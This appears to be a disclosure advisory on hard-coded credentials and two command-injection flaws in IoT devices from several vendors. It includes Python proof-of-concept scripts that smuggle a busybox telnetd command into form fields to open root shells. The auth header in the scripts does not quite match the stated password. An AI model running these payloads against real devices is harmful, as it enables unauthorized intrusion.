Multiple IoT Vendors – Multiple Vulnerabilities

### Vulnerabilities summary The following advisory describes three (3) vulnerabilities found in the following vendors: * Lorex * StarVedia * Eminent * Kraun The vulnerabilities found: * Hard-coded credentials * Remote command injection (2) It is possible to chain the vulnerabilities and to achieve unauthenticated remote command execution. ### Credit An independent security researcher, Robert Kugler (https://www.s3cur3.it), has reported this vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program. ### Vendor response We tried to contact Lorex, Kraun and Eminent, attempts to establish contact went unanswered, therefore no details have been provided on a solution or a workaround. StarVedia were informed of the vulnerabilities and released patches to address them – “These two issues were fixed before your contacting us” ### Vulnerabilities details Hard-coded credentials Default users that can be used to log in in the router’s website is: “supervisor”, with the password “dangerous” #### Remote command injection (1) User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to wlanset.cgi with malicious ‘SSID’ parameter. #### Proof of Concept ``` #!/usr/bin/python import requests import os import time print "Unauthenticated Remote Code Execution" url = 'http://VICTIM-IP/cgi-bin/wlanset.cgi' # Adjust IP address payload = {'WiFiEnable': '1','SSID':'`/bin/busybox telnetd`','SECUNONE':'1','WIFITEST':'WiFi+test'} headers = { "Authorization": "Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==", "Content-type": "application/x-www-form-urlencoded"} r = requests.post(url, data=payload, headers=headers) time.sleep(5) print "\nTry to connect to your target via telnet and use the user name root." ``` #### Remote command injection (2) User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to smtpset.cgi with malicious ‘SMTPSERVER’ parameter. #### Proof of Concept ``` #!/usr/bin/python import requests import os import time print "Unauthenticated Remote Code Execution" url = 'http://VICTIM-IP/cgi-bin/smtpset.cgi' # Adjust IP address payload = {'UseUserDefined': '1','SMTPSERVER':'`/bin/busybox telnetd`','SMTPPORT':'25','SMTPNAME':'','SMTPPASSWD':'','SMTPTEST':'SMTP+server+test'} headers = { "Authorization": "Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==", "Content-type": "application/x-www-form-urlencoded"} r = requests.post(url, data=payload, headers=headers) time.sleep(5) print "\nTry to connect to your target via telnet and use the user name root." ```